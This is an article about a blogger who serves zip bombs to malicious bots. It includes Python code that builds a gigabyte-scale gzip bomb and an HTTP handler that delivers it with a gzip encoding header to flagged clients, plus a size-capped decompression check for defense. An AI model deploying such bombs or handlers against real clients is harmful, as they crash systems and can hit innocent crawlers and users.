
Software developer Ibrahim Diallo maintains a personal blog hosted on his own modest server. By his observation, the majority of incoming traffic consists of automated bots combing the internet for content. Most of these bots are benign, but some attempt to breach the server, injecting malicious code or probing for vulnerabilities. In such cases, Diallo doesn't bother with blacklists or complaints. Instead, he retaliates immediately by serving the bot a zip bomb: a compressed archive that expands a thousandfold on extraction, often crippling the attacker's system.
Zip bombs are deceptively small archives that conceal an enormous volume of data. One well-known example is a 46 MB file that, once unpacked, expands to a staggering 4.5 petabytes—far beyond the capacity of most computers. Technically classified as malicious software, zip bombs are designed to overwhelm and crash systems. Yet Diallo has repurposed them as a defensive weapon against hostile scanners.
He created a 1 MB archive that expands to 1 GB, enough to disable rudimentary bots. For hungrier crawlers with more memory at their disposal, he keeps a 10 MB version that inflates to 10 GB. This countermeasure almost invariably causes unwanted scanners to malfunction or crash.
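To make the mechanics concrete, here is a minimal sketch of how such an archive can be produced, assuming Python and gzip compression (the filename is illustrative, and Diallo's own instructions may differ in detail). Long runs of identical bytes compress at roughly 1000:1, so a gigabyte of zeros shrinks to about a megabyte:

```python
import gzip

OUT = "1G.gz"                      # illustrative output name
CHUNK = b"\x00" * (1024 * 1024)    # 1 MiB of zeros per write

# Stream 1024 chunks (1 GiB uncompressed) through gzip at maximum
# compression; writing in chunks keeps the script's own memory use flat.
with gzip.open(OUT, "wb", compresslevel=9) as f:
    for _ in range(1024):
        f.write(CHUNK)
```

Changing 1024 to 10240 in the loop yields the 10 GB variant, still only around 10 MB on disk.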
When Diallo's system flags a suspicious bot, the server responds with a standard 200 OK status and delivers the zip bomb as the payload. Trusting the response metadata, the bot assumes it has received an ordinary compressed file. The moment it tries to extract the contents, disaster strikes: the massive unpacked data floods the bot's memory, freezing or crashing it.
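One common way to deliver such a payload, consistent with the "metadata" trick described above, is to send the compressed bytes with a Content-Encoding: gzip header so the client's HTTP library inflates them automatically. The sketch below uses Python's standard library; the user-agent check and file name are placeholders, since Diallo's actual bot-detection heuristics are his own:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

BOMB_PATH = "1G.gz"  # archive produced by the earlier sketch (assumed name)

class BombHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Placeholder heuristic: flag one well-known scanner by user agent.
        if "sqlmap" in self.headers.get("User-Agent", "").lower():
            with open(BOMB_PATH, "rb") as f:
                payload = f.read()
            self.send_response(200)                       # ordinary 200 OK
            self.send_header("Content-Encoding", "gzip")  # client auto-inflates
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)                     # ~1 MB on the wire
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"Nothing to see here.")

HTTPServer(("", 8080), BombHandler).serve_forever()
```

From the client's perspective the response looks like a small, ordinary page; the damage happens only when its HTTP stack dutifully decompresses the body.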
For those curious to replicate the tactic, Diallo provides detailed instructions on his blog. However, he offers a word of caution: zip bombs must be handled with great care. Opening one on your own server by mistake can result in self-inflicted damage. Moreover, more sophisticated bots can detect such traps and will simply disregard them. Nonetheless, for the majority of simplistic automated crawlers, this method is more than enough to knock them offline, if only until their next reboot.
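For the cautious, the usual defense (and presumably what those smarter bots do) is to decompress with a hard ceiling rather than trusting an archive's claimed size. A hypothetical helper along these lines, with an arbitrary 100 MB cap:

```python
import gzip

MAX_BYTES = 100 * 1024 * 1024  # arbitrary ceiling; tune to taste

def inflated_size(path: str, cap: int = MAX_BYTES) -> int:
    """Decompress in small chunks, bailing out before a bomb exhausts memory."""
    total = 0
    with gzip.open(path, "rb") as f:
        while chunk := f.read(64 * 1024):
            total += len(chunk)
            if total > cap:
                raise ValueError(f"{path} inflates past {cap} bytes; likely a bomb")
    return total
```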